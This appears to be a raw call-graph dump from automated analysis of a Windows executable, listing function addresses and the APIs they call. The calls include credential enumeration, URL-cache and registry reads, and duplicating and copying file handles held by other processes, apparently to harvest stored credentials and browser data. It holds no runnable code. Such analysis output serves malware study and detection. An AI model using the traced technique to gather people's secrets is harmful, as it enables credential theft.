36547 408e33 memcpy 36546->36547 36547->36481 36549 408e32 36548->36549 36549->36547 36551 4080f9 36550->36551 36552 4080b3 36550->36552 36551->36481 36552->36552 36553 4080c2 malloc 36552->36553 36554 4080d4 36553->36554 36555 4080ef 36553->36555 36556 4080e8 free 36554->36556 36557 4080d8 memcpy 36554->36557 36555->36481 36556->36555 36557->36556 36559 408f01 36558->36559 36560 408ef6 free 36558->36560 36562 4080ac 3 API calls 36559->36562 36561 408f0c 36560->36561 36561->36487 36562->36561 36587 408282 GetModuleFileNameW 36563->36587 36565 40be8f wcsrchr 36566 40bea2 wcscat 36565->36566 36567 40be9e 36565->36567 36566->36495 36567->36566 36588 444b90 36568->36588 36572 40bda6 36591 443d20 GetFileVersionInfoSizeW 36572->36591 36575 40bdc8 wcscpy 36576 40bddd wcscpy wcscpy 36575->36576 36618 40b8c2 36576->36618 36579 40b8c2 3 API calls 36580 40be1c 36579->36580 36581 40b8c2 3 API calls 36580->36581 36582 40be32 36581->36582 36583 40b8c2 3 API calls 36582->36583 36584 40be45 EnumResourceNamesW EnumResourceNamesW wcscpy 36583->36584 36624 40bc29 36584->36624 36587->36565 36589 40bd5d memset memset 36588->36589 36590 408282 GetModuleFileNameW 36589->36590 36590->36572 36592 443d46 36591->36592 36593 40bdc4 36591->36593 36594 443d4e ??2@YAPAXI GetFileVersionInfoW VerQueryValueW 36592->36594 36593->36575 36593->36576 36595 443da3 VerQueryValueW 36594->36595 36596 443d7d 36594->36596 36597 443df2 wcscpy 36595->36597 36598 443dba _snwprintf 36595->36598 36596->36595 36600 443e02 36597->36600 36631 443c91 9 API calls 36598->36631 36632 443c91 9 API calls 36600->36632 36601 443dee 36601->36597 36601->36600 36603 443e14 36633 443c91 9 API calls 36603->36633 36605 443e29 36634 443c91 9 API calls 36605->36634 36607 443e3e 36635 443c91 9 API calls 36607->36635 36609 443e53 36636 443c91 9 API calls 36609->36636 36611 443e68 36637 443c91 9 API calls 36611->36637 36613 443e7d 36638 443c91 9 API calls 36613->36638 36615 443e92 36639 443c91 9 API calls 36615->36639 36617 443ea7 ??3@YAXPAX 36617->36593 36619 444b90 36618->36619 36620 40b8cf memset GetPrivateProfileStringW 36619->36620 36621 40b929 WritePrivateProfileStringW 36620->36621 36622 40b91f 36620->36622 36623 40b925 36621->36623 36622->36621 36622->36623 36623->36579 36625 444b90 36624->36625 36626 40bc36 memset 36625->36626 36627 40bc55 LoadStringW 36626->36627 36628 40bc6f 36627->36628 36628->36627 36630 40bc87 36628->36630 36640 40b93b memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 36628->36640 36630->36423 36631->36601 36632->36603 36633->36605 36634->36607 36635->36609 36636->36611 36637->36613 36638->36615 36639->36617 36640->36628 36651 408250 GetFileAttributesW 36641->36651 36643 40bc93 36644 40bd0c 36643->36644 36645 40bc98 wcscpy wcscpy GetPrivateProfileIntW 36643->36645 36644->36425 36652 40b82a GetPrivateProfileStringW 36645->36652 36647 40bce7 36653 40b82a GetPrivateProfileStringW 36647->36653 36649 40bcf8 36654 40b82a GetPrivateProfileStringW 36649->36654 36651->36643 36652->36647 36653->36649 36654->36644 36687 40c33a 36655->36687 36659 40f3c1 36658->36659 36660 40f315 memset 36658->36660 36659->36511 36727 408282 GetModuleFileNameW 36660->36727 36662 40f33a wcsrchr 36663 40f352 wcscat 36662->36663 36664 40f34f 36662->36664 36728 41409a wcscpy wcscpy wcscpy CreateFileW CloseHandle 36663->36728 36664->36663 36666 40f398 36729 4018f4 GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 36666->36729 36668 40f3b0 36730 40c24e SendMessageW memset SendMessageW 36668->36730 36670 40f3c0 36670->36659 36672 40e965 36671->36672 36678 40e917 36671->36678 36731 407ccf LoadCursorW SetCursor 36672->36731 36674 40e91e _wcsicmp 36674->36678 36675 40e96a 36732 444425 36675->36732 36735 4034e3 36675->36735 36753 408d9f free free 36675->36753 36676 40e97e 36677 4092bc _wcsicmp 36676->36677 36681 40e98e 36677->36681 36678->36672 36678->36674 36754 40e482 10 API calls 36678->36754 36679 40e9d6 36681->36679 36682 40e9cd qsort 36681->36682 36682->36679 36686->36507 36688 40c34b 36687->36688 36700 40c11b 36688->36700 36691 40c3a7 memcpy memcpy 36692 40c3f2 36691->36692 36692->36691 36693 40b301 16 API calls 36692->36693 36694 40c42d ??2@YAPAXI ??2@YAPAXI 36692->36694 36693->36692 36695 40c469 ??2@YAPAXI 36694->36695 36697 40c4a0 36694->36697 36695->36697 36697->36697 36710 40c2ba 36697->36710 36699 40336f 36699->36507 36701 40c126 ??3@YAXPAX 36700->36701 36702 40c12d 36700->36702 36701->36702 36703 40c134 ??3@YAXPAX 36702->36703 36704 40c13b 36702->36704 36703->36704 36705 40c145 ??3@YAXPAX 36704->36705 36706 40c14c 36704->36706 36705->36706 36707 40c16c ??2@YAPAXI ??2@YAPAXI 36706->36707 36708 40c165 ??3@YAXPAX 36706->36708 36709 40c15c ??3@YAXPAX 36706->36709 36707->36691 36708->36707 36709->36708 36711 408f1e free 36710->36711 36712 40c2c3 36711->36712 36713 408f1e free 36712->36713 36714 40c2cb 36713->36714 36715 408f1e free 36714->36715 36716 40c2d3 36715->36716 36717 408f1e free 36716->36717 36718 40c2db 36717->36718 36719 408ee8 4 API calls 36718->36719 36720 40c2ee 36719->36720 36721 408ee8 4 API calls 36720->36721 36722 40c2f8 36721->36722 36723 408ee8 4 API calls 36722->36723 36724 40c302 36723->36724 36725 408ee8 4 API calls 36724->36725 36726 40c30c 36725->36726 36726->36699 36727->36662 36728->36666 36729->36668 36730->36670 36731->36675 36733 444454 36732->36733 36734 444435 FreeLibrary 36732->36734 36733->36676 36734->36733 36736 4034f0 36735->36736 36737 40b1bf free 36736->36737 36738 403531 36737->36738 36755 411e4c 36738->36755 36742 40366c 36914 403833 15 API calls 36742->36914 36744 403674 36745 40b1bf free 36744->36745 36746 40367c 36745->36746 36746->36676 36747 4035af memset memcpy 36748 4035ea wcscmp 36747->36748 36749 403557 36747->36749 36748->36749 36749->36742 36749->36747 36749->36748 36912 402d82 11 API calls 36749->36912 36913 40cd44 6 API calls 36749->36913 36751 40361b _wcsicmp 36751->36749 36753->36676 36754->36678 36756 411e5c 36755->36756 36757 411e97 36756->36757 36915 40a94c 36756->36915 36758 411ea6 memset 36757->36758 36765 412141 36757->36765 36993 4109c4 36758->36993 36762 412230 memset memset 36768 414558 10 API calls 36762->36768 36763 4122dd 36769 412399 36763->36769 36770 4122ec memset memset 36763->36770 36850 41221f 36765->36850 37053 410d36 memset memset memset memset memset 36765->37053 36772 412272 wcslen wcslen 36768->36772 36774 4123a8 memset memset memset 36769->36774 36836 412442 36769->36836 36775 414558 10 API calls 36770->36775 36778 412294 36772->36778 36779 4122aa 36772->36779 36782 41244c 36774->36782 36783 41240e 36774->36783 36776 41232e wcslen wcslen 36775->36776 36786 412350 36776->36786 36787 412366 36776->36787 36777 411e8c 36977 4444b7 36777->36977 37152 4083d6 wcslen wcscat wcscpy wcscat 36778->37152 37153 408250 GetFileAttributesW 36779->37153 36781 41255d memset 37123 401c43 memset 36781->37123 37098 414558 36782->37098 36783->36782 36794 412419 36783->36794 36784 411ee6 36785 411f92 36784->36785 36795 411f29 36784->36795 37006 410f47 memset memset memset memset memset 36785->37006 37197 4083d6 wcslen wcscat wcscpy wcscat 36786->37197 37198 408250 GetFileAttributesW 36787->37198 36789 403550 36911 411bb2 8 API calls 36789->36911 37199 40807e wcslen 36794->37199 37131 407991 212 API calls 36795->37131 36798 41260c memset memset memset 36807 414558 10 API calls 36798->36807 36802 4125c9 36818 4125d4 _wcsicmp 36802->36818 36804 412490 37114 411c61 36804->37114 36805 41247a 37217 4083d6 wcslen wcscat wcscpy wcscat 36805->37217 36806 4122bd 36806->36763 37154 40299e 36806->37154 36820 412665 wcslen wcslen 36807->36820 36808 412587 36808->36789 36808->36798 36808->36802 36809 41242b 37202 411cdb memset wcslen wcslen 36809->37202 36810 4121b6 ExpandEnvironmentStringsW 37088 406a86 memset wcslen wcslen 36810->37088 36813 411f40 37132 411dd0 22 API calls 36813->37132 36815 412379 36815->36769 36829 40299e 172 API calls 36815->36829 36823 4125f5 36818->36823 36885 4125eb 36818->36885 36826 41269d 36820->36826 36827 412687 36820->36827 36821 4121b1 36821->36810 36844 4121d7 36821->36844 37220 4442f9 23 API calls 36823->37220 37222 408250 GetFileAttributesW 36826->37222 37221 4083d6 wcslen wcscat wcscpy wcscat 36827->37221 36828 4121de 37151 408d9f free free 36828->37151 36829->36769 36830 411c61 191 API calls 36830->36836 36831 411f90 37034 408d9f free free 36831->37034 36836->36781 36836->36808 36839 40299e 172 API calls 36839->36789 36840 412607 36840->36789 36841 4124e4 36848 411c61 191 API calls 36841->36848 36842 4124ce 37218 4083d6 wcslen wcscat wcscpy wcscat 36842->37218 36843 4126b6 36852 412737 36843->36852 36853 4126cd wcslen wcslen 36843->36853 36844->36828 37150 407991 212 API calls 36844->37150 36846 411fa1 36846->36831 37134 407991 212 API calls 36846->37134 36851 4124fe wcslen wcslen 36848->36851 36850->36762 36850->36763 36855 412522 36851->36855 36856 412538 36851->36856 37225 4442f9 23 API calls 36852->37225 36857 4126f1 36853->36857 36858 412707 36853->36858 37219 4083d6 wcslen wcscat wcscpy wcscat 36855->37219 36868 411c61 191 API calls 36856->36868 37223 4083d6 wcslen wcscat wcscpy wcscat 36857->37223 37224 408250 GetFileAttributesW 36858->37224 36859 411f59 36859->36831 37133 407991 212 API calls 36859->37133 36861 411fe1 36861->36765 37035 413424 36861->37035 36865 41274b 36867 412896 wcslen wcslen 36865->36867 36873 4128d0 36867->36873 36874 4128ba 36867->36874 36868->36836 36870 412000 37135 41367d _wcsicmp _wcsicmp 36870->37135 36872 412720 36872->36852 36879 412750 memset wcslen wcslen 36872->36879 37257 408250 GetFileAttributesW 36873->37257 37256 4083d6 wcslen wcscat wcscpy wcscat 36874->37256 36875 41200a 36877 412016 memset memset memset memset 36875->36877 36878 412138 36875->36878 37136 408328 wcscpy wcsrchr 36877->37136 37142 413401 36878->37142 36883 412792 36879->36883 36884 4127a8 36879->36884 37226 4083d6 wcslen wcscat wcscpy wcscat 36883->37226 37227 409332 36884->37227 36885->36789 36885->36839 36886 412099 37137 408328 wcscpy wcsrchr 36886->37137 36890 4120a9 37138 408328 wcscpy wcsrchr 36890->37138 36892 4120b6 36892->36878 36894 4120bf wcslen wcslen 36892->36894 36895 4120e2 36894->36895 36896 4120f8 36894->36896 37139 4083d6 wcslen wcscat wcscpy wcscat 36895->37139 37140 408250 GetFileAttributesW 36896->37140 36897 412888 37253 409428 36897->37253 36903 412112 36903->36878 37141 407991 212 API calls 36903->37141 36904 412802 wcslen wcslen 36905 4127ed 36904->36905 36905->36897 36905->36904 36909 412860 36905->36909 37235 4092ee 36905->37235 37240 4083d6 wcslen wcscat wcscpy wcscat 36905->37240 37241 408250 GetFileAttributesW 36905->37241 37243 40938f 36905->37243 37242 4442f9 23 API calls 36909->37242 36911->36749 36912->36751 36913->36749 36914->36744 36916 40a959 36915->36916 37258 408d9f free free 36916->37258 36918 40a96c 37259 408d9f free free 36918->37259 36920 40a974 37260 408d9f free free 36920->37260 36922 40a97c 36923 408f1e free 36922->36923 36924 40a984 36923->36924 37261 40a420 memset 36924->37261 36929 408e6f 9 API calls 36930 40a9a7 36929->36930 36931 408e6f 9 API calls 36930->36931 36932 40a9b4 36931->36932 37290 40a56f 36932->37290 36936 40aa72 36945 40956d 36936->36945 36937 40aa6a 36938 403c2a 7 API calls 36937->36938 36938->36936 36943 40a9c2 36943->36936 36943->36937 36944 40a7da 18 API calls 36943->36944 37313 408c7e 36943->37313 36944->36943 37467 403b29 36945->37467 36948 409740 37475 403ba4 36948->37475 36949 4095ab 36949->36948 36953 4095b5 wcslen 36949->36953 36950 40959c CredEnumerateW 36950->36949 36953->36948 36954 4095e4 36953->36954 36954->36948 36955 4095ec wcsncmp 36954->36955 36958 40962b 36954->36958 36955->36954 36957 409665 memset 36957->36958 36959 40968f memcpy 36957->36959 36958->36954 36958->36957 36958->36959 37478 403bb9 LoadLibraryW GetProcAddress FreeLibrary 36958->37478 36960 4096f4 wcschr 36959->36960 36961 4096d7 _wcsnicmp 36959->36961 36962 4096eb 36960->36962 36961->36960 36961->36962 36962->36960 36963 409726 LocalFree 36962->36963 36963->36954 36964 40add0 37479 413acb 36964->37479 36967 40ae2c 36970 413acb FreeLibrary 36967->36970 36968 40adee GetProcAddress 36968->36967 36969 40ae08 36968->36969 36969->36967 36972 40ae18 36969->36972 36971 40ae31 36970->36971 36971->36777 37482 413b37 CoTaskMemFree 36972->37482 36974 40ae24 36975 413acb FreeLibrary 36974->36975 36976 413aff 36975->36976 36976->36777 37483 4443b0 36977->37483 36979 4445f6 36979->36757 36981 4443b0 8 API calls 36982 4444fc 36981->36982 36983 4445e2 36982->36983 37486 444369 GetVersionExW 36982->37486 36984 4443b0 8 API calls 36983->36984 36984->36979 36986 444551 memcmp 36990 44453d 36986->36990 36987 4445d8 36988 4443b0 8 API calls 36987->36988 36988->36983 36990->36986 36990->36987 36992 4443b0 8 API calls 36990->36992 37487 444456 8 API calls 36990->37487 37488 408d5f GetVersionExW 36990->37488 36992->36990 36994 4109d9 36993->36994 37489 410a52 36994->37489 36997 4109f0 37003 410a30 36997->37003 37503 4086ba CreateFileW GetFileTime CloseHandle 36997->37503 36998 410a46 37502 408d9f free free 36998->37502 37000 410a4e wcsrchr 37000->36784 37002 410a06 CompareFileTime 37002->36997 37003->36998 37004 40807e 2 API calls 37003->37004 37005 410a45 37004->37005 37005->36998 37007 414558 10 API calls 37006->37007 37008 410fd1 37007->37008 37009 414558 10 API calls 37008->37009 37010 410fdf wcslen wcslen 37009->37010 37011 41101d wcslen wcslen 37010->37011 37012 411006 37010->37012 37015 411064 wcslen wcslen 37011->37015 37016 41104d 37011->37016 37551 4083d6 wcslen wcscat wcscpy wcscat 37012->37551 37019 411094 37015->37019 37020 4110ab 37015->37020 37552 4083d6 wcslen wcscat wcscpy wcscat 37016->37552 37553 4083d6 wcslen wcscat wcscpy wcscat 37019->37553 37022 410b8f 22 API calls 37020->37022 37023 4110c7 37022->37023 37024 410b8f 22 API calls 37023->37024 37025 4110d8 37024->37025 37534 411158 memset wcslen wcslen 37025->37534 37027 411149 37554 408d9f free free 37027->37554 37028 4110f8 memset 37032 4110ed 37028->37032 37030 411151 37030->36846 37031 40807e 2 API calls 37031->37032 37032->37027 37032->37028 37032->37031 37033 408e6f 9 API calls 37032->37033 37033->37032 37034->36861 37036 40b1bf free 37035->37036 37037 41343d CreateToolhelp32Snapshot memset Process32FirstW 37036->37037 37038 4135d8 Process32NextW 37037->37038 37039 41347d OpenProcess 37038->37039 37040 4135ef CloseHandle 37038->37040 37041 413588 37039->37041 37042 4134cb memset 37039->37042 37040->36870 37041->37038 37044 413597 free 37041->37044 37045 4080ac 3 API calls 37041->37045 37569 4135ff 37042->37569 37044->37041 37045->37041 37046 4134f7 37047 41350f GetModuleHandleW 37046->37047 37050 413542 QueryFullProcessImageNameW 37046->37050 37574 413031 37046->37574 37590 41337c 37046->37590 37047->37046 37049 41351e GetProcAddress 37047->37049 37049->37046 37050->37046 37052 41357a CloseHandle 37052->37041 37054 414558 10 API calls 37053->37054 37055 410dc0 37054->37055 37056 414558 10 API calls 37055->37056 37057 410dce wcslen wcslen 37056->37057 37058 410e0c wcslen wcslen 37057->37058 37059 410df5 37057->37059 37062 410e53 wcslen wcslen 37058->37062 37063 410e3c 37058->37063 37603 4083d6 wcslen wcscat wcscpy wcscat 37059->37603 37066 410e83 37062->37066 37068 410e9a 37062->37068 37604 4083d6 wcslen wcscat wcscpy wcscat 37063->37604 37605 4083d6 wcslen wcscat wcscpy wcscat 37066->37605 37069 410b8f 22 API calls 37068->37069 37070 410eb6 37069->37070 37071 410b8f 22 API calls 37070->37071 37072 410ec7 37071->37072 37073 411158 35 API calls 37072->37073 37079 410edc 37073->37079 37074 410f38 37602 408d9f free free 37074->37602 37076 410ee7 memset 37076->37079 37077 410f40 memset 37081 413ea4 37077->37081 37078 40807e 2 API calls 37078->37079 37079->37074 37079->37076 37079->37078 37080 408e6f 9 API calls 37079->37080 37080->37079 37606 413e4f RegOpenKeyExW 37081->37606 37083 413eba 37084 41219e 37083->37084 37607 413e69 RegQueryValueExW 37083->37607 37084->36810 37149 408250 GetFileAttributesW 37084->37149 37086 413ed1 RegCloseKey 37086->37084 37089 406ad1 37088->37089 37090 406ae0 37088->37090 37608 4083d6 wcslen wcscat wcscpy wcscat 37089->37608 37609 408250 GetFileAttributesW 37090->37609 37093 406af8 37094 406b44 37093->37094 37095 406b01 memset 37093->37095 37094->36844 37610 408cac FindFirstFileW FindNextFileW FindClose 37095->37610 37097 406b31 37097->37094 37099 4144ab 2 API calls 37098->37099 37100 41456a 37099->37100 37101 41459d memset 37100->37101 37611 4083a1 37100->37611 37103 4145be 37101->37103 37614 413e4f RegOpenKeyExW 37103->37614 37106 41458e SHGetSpecialFolderPathW 37108 412458 wcslen wcslen 37106->37108 37107 4145eb 37109 41461e wcscpy 37107->37109 37615 4144da wcscpy 37107->37615 37108->36804 37108->36805 37109->37108 37111 4145fc 37616 413e69 RegQueryValueExW 37111->37616 37113 414613 RegCloseKey 37113->37109 37115 409332 9 API calls 37114->37115 37118 411c9c 37115->37118 37116 40938f 9 API calls 37116->37118 37117 411ccb 37119 409428 FindClose 37117->37119 37118->37116 37118->37117 37120 4092ee 2 API calls 37118->37120 37122 411cdb 182 API calls 37118->37122 37121 411cd6 wcslen wcslen 37119->37121 37120->37118 37121->36841 37121->36842 37122->37118 37124 414558 10 API calls 37123->37124 37125 401c77 wcslen wcslen 37124->37125 37126 401cad 37125->37126 37127 401c9e 37125->37127 37618 408250 GetFileAttributesW 37126->37618 37617 4083d6 wcslen wcscat wcscpy wcscat 37127->37617 37130 401cbb 37130->36808 37131->36813 37132->36859 37133->36859 37134->36846 37135->36875 37136->36886 37137->36890 37138->36892 37139->36896 37140->36903 37141->36878 37143 413411 37142->37143 37144 413407 FreeLibrary 37142->37144 37145 40b1bf free 37143->37145 37144->37143 37146 41341a 37145->37146 37147 40b1bf free 37146->37147 37148 413422 37147->37148 37148->36765 37149->36821 37150->36844 37151->36850 37152->36779 37153->36806 37155 444b90 37154->37155 37156 4029ab memset CreateFileW 37155->37156 37157 402a06 FindCloseChangeNotification 37156->37157 37158 4029e6 37156->37158 37159 402a0d memset 37157->37159 37698 4080fd GetTempPathW 37158->37698 37619 408c5e WideCharToMultiByte 37159->37619 37162 4029f6 CopyFileW 37162->37159 37163 402a35 37620 44376f 37163->37620 37166 402c84 37167 402c9c 37166->37167 37168 402c8f DeleteFileW 37166->37168 37167->36763 37168->37167 37170 402a6e 37171 402c7c 37170->37171 37701 424adb 37170->37701 37678 4430da 37171->37678 37174 402a82 37175 402a87 memset 37174->37175 37176 402c77 37174->37176 37719 424cc3 17 API calls 37175->37719 37729 42483d 124 API calls 37176->37729 37179 424cc3 17 API calls 37184 402aa6 37179->37184 37183 408c93 MultiByteToWideChar 37183->37184 37184->37179 37184->37183 37720 424c52 16 API calls 37184->37720 37721 424ca3 16 API calls 37184->37721 37722 4028fb SystemTimeToFileTime FileTimeToLocalFileTime 37184->37722 37723 408c93 MultiByteToWideChar 37184->37723 37186 402b57 MultiByteToWideChar 37724 424c52 16 API calls 37186->37724 37191 424ca3 16 API calls 37196 402b81 37191->37196 37193 402be7 memset memcpy MultiByteToWideChar LocalFree 37193->37196 37194 40807e 2 API calls 37194->37196 37195 424adb 138 API calls 37195->37196 37196->37174 37196->37191 37196->37193 37196->37194 37196->37195 37725 4248d4 13 API calls 37196->37725 37726 424c52 16 API calls 37196->37726 37727 422b41 13 API calls 37196->37727 37728 403bb9 LoadLibraryW GetProcAddress FreeLibrary 37196->37728 37197->36787 37198->36815 37200 408092 memcpy 37199->37200 37201 40808f 37199->37201 37200->36809 37201->37200 37203 411d29 37202->37203 37204 411d38 37202->37204 38070 4083d6 wcslen wcscat wcscpy wcscat 37203->38070 38068 408250 GetFileAttributesW 37204->38068 37207 411d4f 37208 411d69 wcslen wcslen 37207->37208 37209 40299e 172 API calls 37207->37209 37210 411d88 37208->37210 37211 411d97 37208->37211 37209->37208 38071 4083d6 wcslen wcscat wcscpy wcscat 37210->38071 38069 408250 GetFileAttributesW 37211->38069 37214 411daf 37215 411dc9 37214->37215 37216 40299e 172 API calls 37214->37216 37215->36830 37216->37215 37217->36804 37218->36841 37219->36856 37220->36840 37221->36826 37222->36843 37223->36858 37224->36872 37225->36865 37226->36884 37228 409428 FindClose 37227->37228 37229 40933e 37228->37229 37230 40807e 2 API calls 37229->37230 37231 409351 wcslen wcslen 37230->37231 37232 409378 37231->37232 37234 409381 37231->37234 38072 4083d6 wcslen wcscat wcscpy wcscat 37232->38072 37234->36905 37236 4092fa 37235->37236 37237 409329 37235->37237 37236->37237 37238 409301 wcscmp 37236->37238 37237->36905 37238->37237 37239 409318 wcscmp 37238->37239 37239->37237 37240->36905 37241->36905 37242->36905 37244 40939a FindFirstFileW 37243->37244 37245 4093bb FindNextFileW 37243->37245 37246 4093d6 37244->37246 37247 4093d1 37245->37247 37248 4093dd wcslen wcslen 37245->37248 37246->37248 37250 409416 37246->37250 37249 409428 FindClose 37247->37249 37248->37250 37251 40940d 37248->37251 37249->37246 37250->36905 38073 4083d6 wcslen wcscat wcscpy wcscat 37251->38073 37254 409431 FindClose 37253->37254 37255 40943b 37253->37255 37254->37255 37255->36867 37256->36873 37257->36885 37258->36918 37259->36920 37260->36922 37262 414558 10 API calls 37261->37262 37263 40a45a 37262->37263 37330 40a37f 37263->37330 37268 40a56a 37285 408e6f 37268->37285 37270 40a4a9 FindFirstUrlCacheEntryW 37271 40a562 37270->37271 37272 40a4ca wcschr 37270->37272 37361 409552 37271->37361 37274 40a50a FindNextUrlCacheEntryW 37272->37274 37275 40a4dd 37272->37275 37274->37272 37277 40a51f GetLastError 37274->37277 37276 408e6f 9 API calls 37275->37276 37278 40a4ea wcschr 37276->37278 37279 40a559 FindCloseUrlCache 37277->37279 37280 40a52a 37277->37280 37278->37274 37281 40a4fb 37278->37281 37279->37271 37282 409539 2 API calls 37280->37282 37283 408e6f 9 API calls 37281->37283 37284 40a53d FindNextUrlCacheEntryW 37282->37284 37283->37274 37284->37272 37284->37279 37457 408e94 37285->37457 37288 408e90 37288->36929 37289 408dc5 7 API calls 37289->37288 37462 408d9f free free 37290->37462 37292 40a588 37463 413e4f RegOpenKeyExW 37292->37463 37294 40a599 37295 40a5a4 37294->37295 37296 40a6b5 37294->37296 37297 408ee8 4 API calls 37295->37297 37310 403c2a 37296->37310 37298 40a5be memset 37297->37298 37464 408f37 37298->37464 37301 40a617 37303 40a620 _wcsupr 37301->37303 37302 40a6ab RegCloseKey 37302->37296 37304 408dc5 7 API calls 37303->37304 37305 40a63e 37304->37305 37306 408dc5 7 API calls 37305->37306 37307 40a652 memset 37306->37307 37308 408f37 37307->37308 37309 40a68a RegEnumValueW 37308->37309 37309->37302 37309->37303 37311 403c8b 37310->37311 37312 403c2f 7 API calls 37310->37312 37311->36943 37312->37311 37314 40807e 2 API calls 37313->37314 37315 408c8c _wcslwr 37314->37315 37316 40a7da 37315->37316 37317 403c2a 7 API calls 37316->37317 37318 40a7f0 37317->37318 37319 40a8f7 wcslen 37318->37319 37320 40a815 wcslen 37318->37320 37319->36943 37321 403c2a 7 API calls 37320->37321 37322 40a82e 37321->37322 37323 40a8ed 37322->37323 37324 403c2a 7 API calls 37322->37324 37325 403c2a 7 API calls 37323->37325 37326 40a867 37324->37326 37325->37319 37326->37323 37327 40a884 memset 37326->37327 37328 40a8ab 37327->37328 37466 40a72f 9 API calls 37328->37466 37331 409332 9 API calls 37330->37331 37340 40a3bc 37331->37340 37332 40938f 9 API calls 37332->37340 37333 40a410 37335 409428 FindClose 37333->37335 37334 4092ee 2 API calls 37334->37340 37336 40a41b 37335->37336 37342 409ff2 memset memset 37336->37342 37337 40a3dd _wcsicmp 37339 40a3f4 37337->37339 37337->37340 37338 40a37f 37 API calls 37338->37340 37364 40a230 22 API calls 37339->37364 37340->37332 37340->37333 37340->37334 37340->37337 37340->37338 37343 414558 10 API calls 37342->37343 37344 40a043 wcslen wcslen 37343->37344 37345 40a07e 37344->37345 37346 40a06b 37344->37346 37365 408250 GetFileAttributesW 37345->37365 37388 4083d6 wcslen wcscat wcscpy wcscat 37346->37388 37349 40a095 37350 40a09a wcslen wcslen 37349->37350 37351 40a0d3 37349->37351 37350->37351 37352 40a0bc 37350->37352 37366 408250 GetFileAttributesW 37351->37366 37389 4083d6 wcslen wcscat wcscpy wcscat 37352->37389 37354 40a0ea 37356 40a0fe 37354->37356 37367 409eb7 37354->37367 37356->37268 37358 409539 37356->37358 37359 409552 ??3@YAXPAX 37358->37359 37360 409541 ??2@YAPAXI 37359->37360 37360->37270 37362 409566 37361->37362 37363 409558 ??3@YAXPAX 37361->37363 37362->37268 37363->37362 37364->37340 37365->37349 37366->37354 37390 409a23 37367->37390 37369 409f98 37370 409fa1 DeleteFileW 37369->37370 37371 409fb5 37369->37371 37370->37371 37372 409552 ??3@YAXPAX 37371->37372 37374 409fc0 37372->37374 37373 409f26 37373->37369 37413 409b7a 37373->37413 37376 409fd1 37374->37376 37377 409fc9 CloseHandle 37374->37377 37379 40b1bf free 37376->37379 37377->37376 37378 409f78 37381 409f81 FindCloseChangeNotification 37378->37381 37382 409f89 37378->37382 37380 409fe0 37379->37380 37385 40b1bf free 37380->37385 37381->37382 37456 408d9f free free 37382->37456 37384 409f45 37384->37378 37433 409cb0 37384->37433 37386 409fe8 37385->37386 37386->37356 37388->37345 37389->37351 37391 405740 22 API calls 37390->37391 37393 409a41 37391->37393 37392 409b70 37392->37373 37393->37392 37394 40978a 68 API calls 37393->37394 37395 409a70 37394->37395 37395->37392 37396 409539 ??2@YAPAXI ??3@YAXPAX 37395->37396 37397 409a92 OpenProcess 37396->37397 37398 409b57 37397->37398 37399 409aa9 GetCurrentProcess DuplicateHandle 37397->37399 37403 405740 22 API calls 37398->37403 37406 409b65 37398->37406 37400 409ad5 GetFileSize 37399->37400 37401 409b4f CloseHandle 37399->37401 37402 4080fd GetTempPathW GetWindowsDirectoryW GetTempFileNameW 37400->37402 37401->37398 37405 409aef 37402->37405 37403->37406 37404 409552 ??3@YAXPAX 37404->37392 37407 407d94 CreateFileW 37405->37407 37406->37404 37408 409af6 CreateFileMappingW 37407->37408 37409 409b10 MapViewOfFile 37408->37409 37410 409b45 CloseHandle CloseHandle 37408->37410 37411 409b40 FindCloseChangeNotification 37409->37411 37412 409b24 WriteFile UnmapViewOfFile 37409->37412 37410->37401 37411->37410 37412->37411 37414 409b91 37413->37414 37415 4060bc 11 API calls 37414->37415 37416 409ba4 37415->37416 37417 409bac memset 37416->37417 37418 409c9e 37416->37418 37420 409bed 37417->37420 37419 405ecf ??3@YAXPAX free 37418->37419 37421 409ca9 37419->37421 37422 4063bb 13 API calls 37420->37422 37423 409755 _wcsicmp 37420->37423 37424 40607f SetFilePointerEx ReadFile 37420->37424 37425 409c88 37420->37425 37429 40695a 8 API calls 37420->37429 37430 408ffd wcslen wcslen _memicmp 37420->37430 37431 409c49 _snwprintf 37420->37431 37421->37384 37422->37420 37423->37420 37424->37420 37426 409c96 37425->37426 37427 409c8d free 37425->37427 37428 408f1e free 37426->37428 37427->37426 37428->37418 37429->37420 37430->37420 37432 408dc5 7 API calls 37431->37432 37432->37420 37434 409cc7 37433->37434 37435 4060bc 11 API calls 37434->37435 37455 409cd8 37435->37455 37436 409ea5 37437 405ecf ??3@YAXPAX free 37436->37437 37439 409eb0 37437->37439 37438 4063bb 13 API calls 37438->37455 37439->37384 37440 40607f SetFilePointerEx ReadFile 37440->37455 37441 409e8e 37442 408f1e free 37441->37442 37444 409e96 37442->37444 37443 409755 _wcsicmp 37443->37455 37444->37436 37445 409e9c free 37444->37445 37445->37436 37446 409755 _wcsicmp 37447 409d7b memset 37446->37447 37448 408f43 6 API calls 37447->37448 37448->37455 37449 40695a 8 API calls 37449->37455 37450 409de5 memcpy 37450->37455 37451 409db8 wcschr 37451->37455 37452 409e00 memcpy 37452->37455 37453 409e1b memcpy 37453->37455 37454 409e36 memcpy 37454->37455 37455->37436 37455->37438 37455->37440 37455->37441 37455->37443 37455->37446 37455->37449 37455->37450 37455->37451 37455->37452 37455->37453 37455->37454 37456->37369 37459 408e9a 37457->37459 37458 408e7f 37458->37288 37458->37289 37459->37458 37460 408eb6 wcscmp 37459->37460 37461 408eaf _wcsicmp 37459->37461 37460->37459 37461->37459 37462->37292 37463->37294 37465 408f3d RegEnumValueW 37464->37465 37465->37301 37465->37302 37466->37323 37468 403ba4 FreeLibrary 37467->37468 37469 403b31 LoadLibraryW 37468->37469 37470 403b42 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37469->37470 37471 403b9f 37469->37471 37472 403b8b 37470->37472 37471->36948 37471->36949 37471->36950 37473 403b91 37472->37473 37474 403ba4 FreeLibrary 37472->37474 37473->37471 37474->37471 37476 403bb4 37475->37476 37477 403baa FreeLibrary 37475->37477 37476->36964 37477->37476 37478->36958 37480 40addc LoadLibraryW 37479->37480 37481 413ad6 FreeLibrary 37479->37481 37480->36967 37480->36968 37481->37480 37482->36974 37484 444424 37483->37484 37485 4443b6 8 API calls 37483->37485 37484->36979 37484->36981 37485->37484 37486->36990 37487->36990 37488->36990 37490 410a66 37489->37490 37504 410c87 memset memset 37490->37504 37492 410b80 37517 408d9f free free 37492->37517 37494 410a84 memset 37499 410a6c 37494->37499 37495 4109df 37495->36997 37495->36998 37496 410aad wcslen wcslen 